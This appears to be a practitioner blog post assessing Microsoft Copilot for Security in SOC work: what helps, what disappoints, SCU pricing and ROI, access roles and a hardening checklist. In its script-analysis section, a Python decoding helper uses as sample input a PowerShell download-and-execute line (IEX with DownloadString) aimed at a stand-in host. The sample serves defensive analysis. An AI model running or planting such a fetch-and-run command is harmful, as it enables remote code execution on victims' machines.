Microsoft Copilot for Security: Six Months In, What Actually Works
Your SOC team activated Copilot for Security six months ago expecting AI-driven incident response. Some capabilities delivered real analyst time savings. Others produced confident-sounding summaries that were factually wrong. This review covers what Copilot actually accelerates in production SOC workflows, what still requires heavy prompt engineering, and where the token economics make it hard to justify at scale.
The Gap Between the Demo and the SOC Floor
Microsoft's Ignite 2024 demos showed Copilot for Security summarizing incidents, correlating threat intelligence, and generating KQL queries in seconds. The demos were impressive. Six months into production deployment across three enterprise SOC teams I have worked with, the reality is more nuanced: some capabilities genuinely reduce analyst time-to-resolution, others produce outputs that require more validation effort than doing the work manually, and the consumption-based pricing model creates unexpected budget pressure that changes how teams use the tool.
This is not a product overview. The Microsoft Security Copilot complete guide covers architecture, setup, and capabilities. This article is the field report: what works, what does not, and what the pricing means in practice after six months of daily SOC use.
What Actually Works: The Three Use Cases That Deliver ROI
1. Incident Summarization Across Defender XDR
The single strongest capability in Copilot for Security is incident summarization in Defender XDR. When an analyst opens a multi-alert incident that spans Defender for Endpoint, Defender for Identity, and Defender for Cloud Apps, Copilot generates a narrative summary that connects the alerts into a coherent attack chain. It identifies the initial access vector, lateral movement indicators, and the current blast radius.
In practice, this saves 8-15 minutes per complex incident. For a SOC handling 40+ incidents per day, that adds up. The summaries are accurate approximately 85% of the time when the underlying alert data is clean. The failure mode is not hallucination in the traditional LLM sense: Copilot does not invent alerts that do not exist. The failure mode is incorrect causal reasoning: it sometimes connects two alerts that happened to involve the same user but were actually unrelated events. An analyst still needs to validate the causal chain, but they start from a structured narrative instead of raw alert JSON.
The KQL behind a typical incident summary audit:
SecurityIncident
| where TimeGenerated > ago(30d)
// Keep only the latest record per incident; the table logs one row per update
| summarize arg_max(TimeGenerated, *) by IncidentNumber
// Assumes Copilot-assisted incidents carry a "CopilotSummary" marker in AdditionalData
| extend CopilotUsed = tostring(AdditionalData) has "CopilotSummary"
| extend MinutesToClose = datetime_diff('minute', ClosedTime, CreatedTime)
| summarize
    TotalIncidents = count(),
    CopilotAssisted = countif(CopilotUsed),
    AvgTimeToTriage_Copilot = avgif(MinutesToClose, CopilotUsed and Status == "Closed"),
    AvgTimeToTriage_Manual = avgif(MinutesToClose, not(CopilotUsed) and Status == "Closed")
    by Severity
| order by Severity asc

Across the three teams, the average time-to-triage improvement for Copilot-assisted incidents was 23% for high-severity and 31% for medium-severity incidents. Low-severity incidents showed minimal improvement because they were already fast to triage manually.
2. Script and Command Analysis
When an analyst encounters a suspicious PowerShell script, encoded command line, or obfuscated VBScript in an alert, Copilot can decode and explain it faster than manual analysis. This is particularly effective for:
- Base64-encoded PowerShell commands extracted from Defender for Endpoint alerts
- Registry modification scripts found in scheduled task persistence mechanisms
- Obfuscated JavaScript from phishing payload analysis
The prompt pattern that works best:
Analyze this PowerShell command. Decode any encoding.
Identify: (1) what it does, (2) indicators of malicious intent,
(3) any C2 infrastructure it contacts, (4) MITRE ATT&CK techniques.
Command: <paste encoded command>

Copilot correctly identifies the purpose of encoded scripts approximately 90% of the time. Where it struggles: multi-stage payloads where stage 1 downloads stage 2. Copilot analyzes the code it can see but cannot follow the download chain to analyze the next stage. Analysts still need to detonate the payload in a sandbox for full analysis.
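For validating Copilot's reading of an encoded command, it helps to decode the payload independently. The sketch below assumes the common case where the command was passed to PowerShell's `-EncodedCommand` switch, which takes Base64 over UTF-16LE text. The function names and the sample URL are illustrative, and the URL extraction is a rough regex, not a full parser.

```python
import base64
import re


def decode_powershell_encoded_command(encoded: str) -> str:
    """Decode a -EncodedCommand payload (Base64 over UTF-16LE text)."""
    raw = base64.b64decode(encoded, validate=True)
    return raw.decode("utf-16-le")


def extract_urls(script: str) -> list[str]:
    """Pull out http(s) URLs as candidate stage-2 download locations."""
    return re.findall(r"https?://[^\s'\")]+", script)


if __name__ == "__main__":
    # Build a harmless sample the same way PowerShell would encode it.
    sample = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage2.ps1')"
    encoded = base64.b64encode(sample.encode("utf-16-le")).decode("ascii")

    decoded = decode_powershell_encoded_command(encoded)
    print(decoded)
    print(extract_urls(decoded))
```

Any URL this surfaces marks where the visible code stops and the next stage begins, which is the point where sandbox detonation takes over.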
3. Natural Language to KQL Translation
Tier 1 and Tier 2 analysts who are not KQL-fluent can ask Copilot questions in natural language and get working KQL queries. Examples that consistently produce correct results:
- "Show me all sign-in failures from outside the US for admin accounts in the last 7 days"
- "Find all processes on endpoint DESKTOP-ABC123 that made network connections to IPs not in our known-good list"
- "List all emails received by user@company.com containing attachments with macro-enabled file extensions"
The generated queries are syntactically correct 92% of the time and logically correct about 80% of the time. The gap between syntactic and logical correctness matters: a query can run without errors but return the wrong result set because Copilot used the wrong table, applied an incorrect filter, or misunderstood a column's value format.
The mitigation: always review the generated KQL before acting on its results. Copilot is a drafting tool for queries, not an autonomous analyst. Treat it like a junior analyst who writes solid first drafts but needs senior review.
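Part of that review can be made mechanical. The following is a minimal sketch of a pre-review check, assuming the reviewer knows which tables a question should hit. It only catches two of the failure modes above (wrong source table, missing time filter); `review_flags` and its heuristics are hypothetical and do not replace reading the query.

```python
import re


def review_flags(kql: str, expected_tables: set[str]) -> list[str]:
    """Return flags a reviewer should check before trusting the query's results."""
    # Drop blank lines and // comments; the first remaining line usually names the source table.
    lines = [
        ln.strip()
        for ln in kql.splitlines()
        if ln.strip() and not ln.strip().startswith("//")
    ]
    if not lines:
        return ["empty query"]

    flags = []
    source = re.split(r"[\s|]", lines[0], maxsplit=1)[0]
    if source not in expected_tables:
        flags.append(f"unexpected source table: {source}")
    # Heuristic only: look for ago(...) or between(...) anywhere in the query.
    if not re.search(r"\bago\s*\(|\bbetween\s*\(", kql):
        flags.append("no time filter found")
    return flags


if __name__ == "__main__":
    draft = 'SigninLogs\n| where TimeGenerated > ago(7d)\n| where ResultType != "0"'
    print(review_flags(draft, {"SigninLogs"}))
    print(review_flags("DeviceProcessEvents\n| take 10", {"DeviceNetworkEvents"}))
```

An empty flag list means only that the draft passed these two checks. Filter logic and column value formats still need a human read.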
What Does Not Work: The Three Capabilities That Disappoint
1. Threat Intelligence Enrichment
Copilot can query Microsoft Threat Intelligence (MDTI) and provide context on IP addresses, domains, and file hashes. In theory. In practice, the enrichment results are frequently stale, incomplete, or already available in the Defender XDR UI without invoking Copilot.
The specific problems:
- Staleness: MDTI data surfaced through Copilot is often 24-48 hours behind what VirusTotal or commercial TI feeds show. For fast-moving campaigns, this delay makes the enrichment unreliable.
- Depth: Copilot returns a paragraph-level summary where analysts need structured IOC data (associated file hashes, DNS resolution history, certificate fingerprints, campaign attribution).
- Redundancy: The same TI data is already embedded in Defender XDR incident entities. Copilot adds a natural language wrapper around data the analyst can already see.
For serious TI work, analysts still pivot to MDTI directly, VirusTotal, Recorded Future, or their ISAC feeds. Copilot's TI capability is useful for quick context during triage but does not replace dedicated TI workflows.
2. Cross-Product Correlation Beyond Microsoft
Copilot integrates deeply with the Microsoft security stack: Defender XDR, Sentinel, Intune, Entra ID, Purview. It does not integrate meaningfully with non-Microsoft security tools. If your SOC uses CrowdStrike for endpoint, Palo Alto for network, or Splunk for SIEM, Copilot cannot correlate data across those boundaries.
The plugin architecture allows third-party integrations, and Microsoft has published the API specification. As of mid-2026, the third-party plugin ecosystem is thin. A few vendors have released plugins, but most are read-only data fetchers rather than deep integrations that enable cross-product reasoning.
For organizations running a hybrid security stack (which is most enterprises), this limits Copilot's correlation ability to the Microsoft surface only. If the initial access came through a CrowdStrike-detected endpoint event and the lateral movement was tracked in Palo Alto logs, Copilot cannot build the unified attack chain without manual data ingestion into Sentinel first.
3. Automated Remediation Recommendations
Copilot suggests remediation actions for incidents: isolate a device, disable a user account, block an IP in the firewall. These recommendations are directionally correct but too generic to execute without modification.
Example: for a compromised user account incident, Copilot consistently recommends "reset the user's password and revoke all active sessions." That is correct but incomplete. It does not check whether the user has federated credentials that also need rotation, whether the account is a service principal owner whose owned applications need credential rotation, or whether the user's Conditional Access policies need a temporary emergency policy to block all access during investigation.
The remediation suggestions are useful as a checklist starting point for junior analysts. They are not useful as automated playbook triggers because they lack the environmental context needed for safe execution.
The Pricing Reality: SCU Consumption Model
Copilot for Security uses Security Compute Units (SCUs) as its billing model. You provision SCUs per hour, and each Copilot interaction consumes SCUs based on the complexity of the request. Microsoft does not publish exact SCU consumption per query type, which makes cost forecasting difficult.
What we observed over six months:
| Operation | Approximate SCU Cost | Notes |
|---|---|---|
| Incident summary (simple, 3-5 alerts) | 1-2 SCUs | Consistent |
| Incident summary (complex, 15+ alerts) | 4-8 SCUs | Varies with alert count |
| Script/command analysis | 1-3 SCUs | Depends on script length |
| KQL generation (simple query) | 1 SCU | Consistent |
| KQL generation (complex, multi-table) | 2-4 SCUs | Higher for joins |
| TI enrichment (single IOC) | 1-2 SCUs | Includes MDTI lookup |
| Guided response / remediation | 2-4 SCUs | Varies by incident type |
| Custom plugin invocation | 2-6 SCUs | Depends on plugin complexity |
| Promptbook execution (multi-step) | 5-15 SCUs | Cumulative across steps |
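The observed ranges can be turned into a rough daily consumption estimate. This sketch takes the low and high figures from the table as-is; the operation keys and the example mix of operations are made up for illustration, and real consumption will vary because Microsoft does not publish per-query figures.

```python
# Observed (low, high) SCU cost per operation, copied from the table above.
SCU_RANGES = {
    "incident_summary_simple": (1, 2),
    "incident_summary_complex": (4, 8),
    "script_analysis": (1, 3),
    "kql_simple": (1, 1),
    "kql_complex": (2, 4),
    "ti_enrichment": (1, 2),
    "guided_response": (2, 4),
    "custom_plugin": (2, 6),
    "promptbook": (5, 15),
}


def estimate_scus(operation_counts: dict[str, int]) -> tuple[int, int]:
    """Return the (low, high) SCU estimate for a given mix of operations."""
    low = sum(SCU_RANGES[op][0] * n for op, n in operation_counts.items())
    high = sum(SCU_RANGES[op][1] * n for op, n in operation_counts.items())
    return low, high


if __name__ == "__main__":
    # Hypothetical shift: 10 simple summaries, 5 complex summaries, 8 simple KQL drafts.
    shift = {"incident_summary_simple": 10, "incident_summary_complex": 5, "kql_simple": 8}
    print(estimate_scus(shift))
```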
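Set the provisioning cost against the analyst time saved. At 3 SCUs/hour, the provisioning level used in the math below, the monthly cost works out to $8,760 (about $4 per SCU-hour over a 730-hour month). If Copilot saves each analyst 45 minutes per day (our measured average for teams that adopted the effective use cases), that is 3.75 hours saved per day across five analysts. At a fully loaded SOC analyst cost of $85/hour, that is about $318/day, or approximately $6,680/month over roughly 21 working days.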
The math:
Time savings only:
Monthly Copilot cost (3 SCU/hour): $8,760
Monthly analyst time savings: $6,680
Net monthly cost: $2,080 (negative ROI)

Including downstream incident cost reduction:
Monthly Copilot cost (3 SCU/hour): $8,760
Monthly analyst time savings: $6,680
Incident MTTR improvement value*: $4,200
Adjusted net monthly value: $2,120 (positive ROI)

* Estimated based on 23% faster triage reducing downstream incident costs by ~$140/incident at 30 significant incidents/month
The ROI is positive only when you factor in the downstream cost reduction from faster incident resolution, and only when your team consistently uses the high-value capabilities (summarization, script analysis, KQL generation). Teams that deploy Copilot broadly without focused training on the effective use cases will see negative ROI.
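To rerun this math with your own numbers, a small calculator is enough. The sketch below reproduces the figures above. The $4 per SCU-hour rate and the 730-hour month are assumptions inferred from the $8,760 figure for 3 SCUs/hour, so check them against your actual pricing.

```python
HOURS_PER_MONTH = 730  # assumption: average number of hours in a month


def monthly_copilot_cost(scus_per_hour: int, usd_per_scu_hour: float) -> float:
    """Provisioned SCUs are billed for every hour, whether or not they are used."""
    return scus_per_hour * usd_per_scu_hour * HOURS_PER_MONTH


def net_monthly_value(cost: float, time_savings: float, downstream_savings: float = 0.0) -> float:
    """Positive means Copilot pays for itself; negative means it does not."""
    return time_savings + downstream_savings - cost


if __name__ == "__main__":
    cost = monthly_copilot_cost(scus_per_hour=3, usd_per_scu_hour=4.0)  # assumed rate
    time_savings = 6680.0          # the article's rounded monthly figure
    downstream = 140.0 * 30        # ~$140/incident at 30 significant incidents/month

    print(cost)
    print(net_monthly_value(cost, time_savings))
    print(net_monthly_value(cost, time_savings, downstream))
```

The sign flips only when the downstream term is included, which makes that estimate the one to test hardest against your own incident data.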
Deployment Recommendations: What to Do in Practice
Phase 1: Pilot With High-Value Use Cases Only (Month 1-2)
Provision 1 SCU/hour. Restrict access to 2-3 senior analysts. Focus exclusively on:
- Incident summarization in Defender XDR
- Script/command analysis for encoded payloads
- KQL generation for threat hunting queries
Measure: time-to-triage before and after Copilot, SCU consumption per shift, analyst satisfaction score.
Phase 2: Expand to Tier 1 With Promptbooks (Month 3-4)
Create custom promptbooks that encode your SOC's standard operating procedures as multi-step Copilot workflows. Examples:
- Phishing triage promptbook: Extract sender domain → Check MDTI reputation → Search email logs for other recipients → Generate IOC list → Draft containment recommendation
- Endpoint compromise promptbook: Summarize incident → Analyze suspicious processes → Check for lateral movement indicators → List affected assets → Draft isolation recommendation
Promptbooks are where Copilot transitions from "analyst assistant" to "workflow accelerator." A well-designed promptbook executes in 30-60 seconds what manually takes 15-20 minutes.
# Export existing promptbook for version control
az security copilot promptbook export \
  --name "phishing-triage-v2" \
  --output-file promptbooks/phishing-triage-v2.json

# List all custom promptbooks
az security copilot promptbook list \
  --output table
Phase 3: Scale With Budget Controls (Month 5-6)
Increase SCU provisioning based on Phase 1-2 consumption data. Implement:
- SCU consumption alerts: Alert when daily consumption exceeds 80% of provisioned capacity
- Usage analytics: Track which analysts use Copilot most, which operations consume the most SCUs, and which promptbooks deliver the most value
- Auto-provisioning rules: Scale SCUs up during business hours and down during off-hours if your SOC has variable staffing
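The first and third controls reduce to simple rules. This is a sketch of the logic only: the function names, the 08:00-18:00 business window, and the SCU levels are hypothetical, and wiring the result to an actual alert or provisioning change is left to whatever automation you already run.

```python
def over_alert_threshold(consumed_scus: float, provisioned_daily_scus: float,
                         threshold: float = 0.80) -> bool:
    """True once daily consumption exceeds the given share of provisioned capacity."""
    return consumed_scus > threshold * provisioned_daily_scus


def scus_for_hour(hour: int, business_scus: int = 3, off_hours_scus: int = 1,
                  start_hour: int = 8, end_hour: int = 18) -> int:
    """Target SCU provisioning for a given hour of the day (0-23)."""
    return business_scus if start_hour <= hour < end_hour else off_hours_scus


if __name__ == "__main__":
    daily_capacity = 3 * 24  # 3 SCUs/hour provisioned around the clock
    print(over_alert_threshold(58, daily_capacity))
    print([scus_for_hour(h) for h in (7, 9, 17, 18)])
```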
RBAC for Copilot for Security
Copilot access is controlled through Entra ID role assignments. The principle: not every analyst needs Copilot access, and not every Copilot user needs the same capability set.
| Entra ID Role | Copilot Capability | Assign To |
|---|---|---|
| Security Administrator | Full Copilot access + settings management | SOC leads, security architects |
| Security Operator | Copilot queries + promptbook execution | Tier 2-3 analysts |
| Security Reader | Copilot queries (read-only context) | Tier 1 analysts, auditors |
| Global Reader | View Copilot usage analytics only | Management, finance |
For non-human identities that interact with Copilot's API (automation accounts, SOAR playbooks), use workload identity federation rather than shared secrets. Copilot API tokens are high-value credentials that provide access to security data across your entire Microsoft tenant.
What Is Missing: Features the Product Needs
1. Confidence Scoring on Outputs
Copilot does not tell you how confident it is in its own output. An incident summary that connects three alerts through strong IOC overlap looks identical to a summary that connects three alerts through temporal coincidence. The analyst has no signal from Copilot about which connections are strong evidence and which are weak correlation.
Every Copilot output should include a confidence indicator: high (direct evidence linkage), medium (behavioral correlation), low (temporal or entity coincidence). Until this exists, treat every Copilot summary as a hypothesis, not a conclusion.
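Until the product provides this, an analyst can apply the same three tiers by hand when checking a summary's causal chain. The sketch below is one possible encoding of those tiers, not anything Copilot exposes: the `Alert` fields are hypothetical, and shared MITRE ATT&CK technique IDs stand in for "behavioral correlation".

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    alert_id: str
    user: str
    minute: int                          # minutes since the incident window opened
    iocs: frozenset = frozenset()        # IPs, hashes, domains seen in the alert
    techniques: frozenset = frozenset()  # ATT&CK technique IDs, a stand-in for behavior


def link_confidence(a: Alert, b: Alert, window_minutes: int = 60) -> str:
    """Label how strongly two alerts are connected, using the three tiers above."""
    if a.iocs & b.iocs:
        return "high"    # direct evidence linkage: a shared IOC
    if a.techniques & b.techniques:
        return "medium"  # behavioral correlation: a shared technique
    if a.user == b.user or abs(a.minute - b.minute) <= window_minutes:
        return "low"     # entity or temporal coincidence only
    return "none"


if __name__ == "__main__":
    first = Alert("a1", "alice", 0, frozenset({"203.0.113.5"}), frozenset({"T1059"}))
    same_user_later = Alert("a2", "alice", 2000)
    print(link_confidence(first, same_user_later))
```

The same-user case is the failure mode seen in incident summaries: two alerts tied together by nothing more than a shared account.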
2. Cost Attribution Per Investigation
There is no way to attribute SCU consumption to a specific incident or investigation. If your SOC works a major incident for three days and uses 200 SCUs of Copilot capacity, that cost is invisible in incident reporting. For SOCs that do cost-per-incident analysis or chargeback to business units, this is a reporting gap.
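A workaround is to keep your own usage log keyed by incident ID. The sketch below assumes analysts (or a wrapper around your prompts) record an estimated SCU figure per Copilot interaction. The record layout is hypothetical and the totals are only as good as those estimates.

```python
from collections import defaultdict


def scus_by_incident(usage_log: list[tuple[str, str, int]]) -> dict[str, int]:
    """Sum logged SCU usage per incident ID from (incident_id, operation, scus) records."""
    totals: dict[str, int] = defaultdict(int)
    for incident_id, _operation, scus in usage_log:
        totals[incident_id] += scus
    return dict(totals)


if __name__ == "__main__":
    log = [
        ("INC-1001", "incident_summary", 6),
        ("INC-1001", "promptbook", 12),
        ("INC-1002", "kql_generation", 1),
    ]
    print(scus_by_incident(log))
```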
3. Custom Model Grounding
Copilot reasons over Microsoft's security data and its built-in knowledge base. You cannot ground it on your organization's internal runbooks, past incident reports, or custom threat models. If your SOC has spent years building institutional knowledge in a wiki or knowledge base, Copilot cannot access that context.
The plugin architecture theoretically supports custom data sources, but the current implementation requires building a REST API that returns structured data. There is no "upload your SOC runbook PDF and let Copilot reference it" capability.
4. Multi-Tenant Support for MSSPs
Managed Security Service Providers (MSSPs) operating across multiple customer tenants cannot use a single Copilot instance to reason across tenants. Each tenant requires its own SCU provisioning and separate Copilot session. For an MSSP managing 50 tenants, the minimum cost is $146,000/month at 1 SCU/hour per tenant, which is prohibitive for all but the largest providers.
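The tenant math scales linearly, which is why it gets prohibitive quickly. A short sketch, assuming the same $4 per SCU-hour rate and 730-hour month implied by the $146,000 figure:

```python
def mssp_minimum_monthly_cost(tenants: int, scus_per_tenant: int = 1,
                              usd_per_scu_hour: float = 4.0,
                              hours_per_month: int = 730) -> float:
    """Minimum monthly spend when every tenant needs its own provisioned SCUs."""
    return tenants * scus_per_tenant * usd_per_scu_hour * hours_per_month


if __name__ == "__main__":
    print(mssp_minimum_monthly_cost(50))  # rate and month length are assumptions
    print(mssp_minimum_monthly_cost(10))
```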
Comparison: Copilot for Security vs. Standalone AI Tools
| Capability | Copilot for Security | ChatGPT/Claude + Manual Context | Standalone SOC AI (e.g., Torq, Tines AI) |
|---|---|---|---|
| Microsoft data integration | Native, real-time | None (manual copy-paste) | Via API connectors |
| Incident summarization | Automated, context-aware | Manual prompt engineering | Varies by product |
| KQL generation | Good, table-aware | Generic, often wrong tables | Not applicable |
| Script analysis | Good | Excellent (larger context window) | Not a focus |
| Cross-vendor correlation | Microsoft only | Vendor-agnostic (manual) | API-dependent |
| Remediation automation | Suggestions only | No execution capability | Full SOAR automation |
| Cost model | SCU consumption | Per-token | Flat platform fee |
| Data residency | Microsoft cloud boundary | Data leaves your boundary | Varies |
Honest Assessment: When to Deploy and When to Wait
Deploy now if:
- Your SOC is 80%+ Microsoft security stack (Defender XDR, Sentinel, Entra ID)
- You have Tier 1 analysts who struggle with KQL and alert fatigue
- Your average incident triage time exceeds 25 minutes for medium-severity incidents
- You can commit to focused training on the three effective use cases
- You can absorb $8,000-15,000/month in additional security tooling cost

Wait if:
- Your security stack is primarily non-Microsoft (CrowdStrike, Splunk, Palo Alto)
- Your SOC is fewer than three analysts (the time savings do not offset the cost)
- You expect Copilot to replace analyst headcount (it accelerates analysts; it does not replace them)
- You need cross-vendor correlation as a primary capability
- Your budget cannot absorb the consumption cost during the learning curve period
Hardening Checklist
- [ ] Copilot access restricted via Entra ID roles to authorized SOC personnel only
- [ ] Conditional Access policy applied to Copilot: compliant device, MFA, named location
- [ ] SCU provisioning right-sized based on measured consumption (not Microsoft's recommendation)
- [ ] SCU consumption alerts configured at 80% daily threshold
- [ ] Custom promptbooks created for top 5 SOC investigation workflows
- [ ] Analyst training completed on effective use cases (summarization, script analysis, KQL)
- [ ] Output validation process documented: every Copilot summary treated as hypothesis until analyst-confirmed
- [ ] Usage analytics dashboard deployed tracking SCU cost per analyst and per operation type
- [ ] Third-party plugin integrations evaluated for non-Microsoft security tools in your stack
- [ ] Data residency requirements verified for your regulatory environment before enabling Copilot
- [ ] Workload identity federation used for any non-human identities accessing Copilot API
- [ ] Monthly ROI review scheduled comparing Copilot cost against measured analyst time savings
Microsoft Cloud Solution Architect
Cloud Solution Architect with deep expertise in Microsoft Azure and a strong background in systems and IT infrastructure. Passionate about cloud technologies, security best practices, and helping organizations modernize their infrastructure.